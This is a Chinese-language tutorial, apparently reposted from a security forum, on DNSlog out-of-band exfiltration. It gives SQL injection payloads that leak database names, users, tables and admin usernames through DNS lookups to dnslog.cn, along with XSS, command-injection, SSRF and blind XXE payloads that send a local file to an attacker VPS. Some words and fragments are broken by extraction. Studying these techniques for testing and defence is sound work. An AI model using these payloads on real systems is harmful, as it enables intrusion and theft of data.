www.dnslog.cn
使用方法ceye.io
使用方法http://www.dnslog.cn
使用方法类似A.com
,就要靠DNS服务器将A.com解析到它的真实ip127.0.0.1,这样就可以访问127.0.0.1服务器上的相应服务。www.baidu.com
等的访问信息,类似日志文件。tieba.baidu.com
a.com
,我在域名代理商那里将域名设置对应的ip 1.1.1.1 上,这样当我向dns服务器发起a.com的解析请求时,DNSlog中会记录下他给a.com解析,解析值为1.1.1.1,而我们这个解析的记录的值就是我们要利用的地方。\\\www.mss.cn\2.txt
/
,即//www.mss.cn/2.txt,如果硬要用反斜杠,得另外加两个反斜杠来转义,即要四个反斜杠,很麻烦。如:(select load_file(concat('\\\\',(select datab ase()),'.xxxx.ceye.io\\abc')))and (select count(*) from mysql.user)>0 /*如果结果返回正常,说明具有读写权限.*/
and (select count(*) from mysql.user)>0 /*返回错误,应该是管理员给数据库账户降权了*/
show variables like '%secure%'
;查看load_file()可以读取的磁盘。max_allowed_packet
show global VARIABLES like 'max_allowed_packet';
如果文件超过了max_allowed_packet,则结果如下:
mysql> select load_file("C:/Users/XF/Desktop/杀猪盘/index.php");
+---------------------------------------------------+
| load_file("C:/Users/XF/Desktop/杀猪盘/index.php") |
+---------------------------------------------------+
| NULL |
+---------------------------------------------------+
\\\www.mss.cn\2.txt
。微软里喜欢跟别人反着来,所以在微软文件夹里查询用反斜杠\\
;而这里如果要在url中得用正斜杠/
,不然查不出来,如果硬要用反斜杠,得另外加反斜杠来转义,unc路径就要四个反斜杠,很麻烦。如:(select load_file(concat('\\\\',(select datab ase()),'.xxxx.ceye.io\\abc')))当前库名payload:and (select load_file(concat('//',(select datab ase()),'.6.eudspa.dnslog.cn/a')))
注意:后面这个a文件存不存在并不重要,随便写个文件就行,只要发生了DNS解析,我们就能看到我们所需要的东西,如这里的库名,但是这个文件必须要写,因为这是load_file函数所需要的条件。
用户名payload:and (select load_file(concat('//',(select hex(user())),'.wlgbdd.dnslog.cn/a')))
注意:为什么要对查询的内容进行hex编码?
如果我们要查询的用户名中存在特殊字符:如[email protected]#$%^&
最后在请求DNS服务器时变成:[email protected]#$%^&*.upa46v.dnslog.cn
存在特殊字符的域名无法解析。因此在DNS日志中也找不到我们查询的数据。
所以在我们查询时,当不确定查询结果是否存在特殊字符时,最好先将其hex编码后在带入查询。
第一个表名payload:and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=datab ase() limit 0,1),'.wlgbdd.dnslog.cn/a')))
通过修改 limit 0,1 可以获得不同数据表
第二个数据列名payload:and (select load_file(concat('//',(select column_name from information_schema.columns where table_name='admin' limit 1,1),'.wlgbdd.dnslog.cn/a')))
通过修改 limit 0,1 可以获得不同数据列
表‘admin’列‘username’第一个字段名payload:and (select load_file(concat('//',(select username from maoshe.admin limit 0,1),'.wlgbdd.dnslog.cn/a')))
通过修改 limit 0,1 可以获得不同数据
<img src=http://xss.xxx.ceye.io>
ping %os%.xxxx.cete.io
即可//变量 类型 描述
//%ALLUSERSPROFILE% 本地 返回“所有用户”配置文件的位置。
//%APPDATA% 本地 返回默认情况下应用程序存储数据的位置。
//%CD% 本地 返回当前目录字符串。
//%CMDCMDLINE% 本地 返回用来启动当前的 Cmd.exe 的准确命令行。
//%CMDEXTVERSION% 系统 返回当前的“命令处理程序扩展”的版本号。
//%COMPUTERNAME% 系统 返回计算机的名称。
//%COMSPEC% 系统 返回命令行解释器可执行程序的准确路径。
//%DATE% 系统 返回当前日期。使用与 date /t 命令相同的格式。由 Cmd.exe 生成。有关 date 命令的详细信息,请参阅 Date。
//%ERRORLEVEL% 系统 返回上一条命令的错误代码。通常用非零值表示错误。
//%HOMEDRIVE% 系统 返回连接到用户主目录的本地工作站驱动器号。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。
//%HOMEPATH% 系统 返回用户主目录的完整路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。
//%HOMESHARE% 系统 返回用户的共享主目录的网络路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。
//%LOGONSERVER% 本地 返回验证当前登录会话的域控制器的名称。
//%NUMBER_OF_PROCESSORS% 系统 指定安装在计算机上的处理器的数目。
//%OS% 系统 返回操作系统名称。Windows 2000 显示其操作系统为 Windows_NT。
//%PATH% 系统 指定可执行文件的搜索路径。
//%PATHEXT% 系统 返回操作系统认为可执行的文件扩展名的列表。
//%PROCESSOR_ARCHITECTURE% 系统 返回处理器的芯片体系结构。值:x86 或 IA64(基于 Itanium)。
//%PROCESSOR_IDENTFIER% 系统 返回处理器说明。
//%PROCESSOR_LEVEL% 系统 返回计算机上安装的处理器的型号。
//%PROCESSOR_REVISION% 系统 返回处理器的版本号。
//%P ROMPT% 本地 返回当前解释程序的命令提示符设置。由 Cmd.exe 生成。
//%RANDOM% 系统 返回 0 到 32767 之间的任意十进制数字。由 Cmd.exe 生成。
//%SYSTEMDRIVE% 系统 返回包含 Windows server operating system 根目录(即系统根目录)的驱动器。
//%SYSTEMROOT% 系统 返回 Windows server operating system 根目录的位置。
//%TEMP%和%TMP% 系统和用户 返回对当前登录用户可用的应用程序所使用的默认临时目录。有些应用程序需要 TEMP,而其他应用程序则需要 TMP。
//%TIME% 系统 返回当前时间。使用与time /t命令相同的格式。由Cmd.exe生成。有关time命令的详细信息,请参阅 Time。
//%USERDOMAIN% 本地 返回包含用户帐户的域的名称。
//%USERNAME% 本地 返回当前登录的用户的名称。
//%USERPROFILE% 本地 返回当前用户的配置文件的位置。
//%WINDIR% 系统 返回操作系统目录的位置。
/?url=http://127.0.0.1/flag.php
/?url=http://hfsy89.ceye.io
<!ENTITY 实体名称 "实体的值">
<!ENTITY writer "Johnson666">
<!ENTITY copyright "Copyright W3School.com.cn">
<author>&writer;©right;</author> //&writer;相当于 "Johnson666"
<!ENTITY 实体名称 SYSTEM "URI/URL">
<!ENTITY writer SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
<!ENTITY copyright SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
<author>&writer;©right;</author>
这两种引用的方式都为:
&实体名;
<?X ML version="1.0" encoding="gb2312"?>
<!DOCTYPE a [
<!ENTITY xi SYSTEM "http://hfsy89.ceye.io">
]>
<reset><login>ξ</login><secret>Any bugs?</secret></reset>
<!ENTITY % file SYSTEM "php://filter/read=convert.b ase64-encode/resource=file:///c:/windows/blind.txt">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://vps的ip:6666/%file;'>">
http://vps的ip:6666/
,实体file为file:///c:/windows/blind.txt
(经过b ase64编码),总体的意思就是访问vps的6666端口并携带本机的c:/windows/blind.txt的文件。python -m http.server 11111
<?X ML version="1.0" encoding="gb2312"?>
<!DOCTYPE root [
<!ENTITY % xxe SYSTEM "http://vps ip:web端口/a.dtd">
%xxe;%int;%send; ]>
先知社区:https://xz.aliyun.com/t/9747作者:低调求发展潜心学安全
热文推荐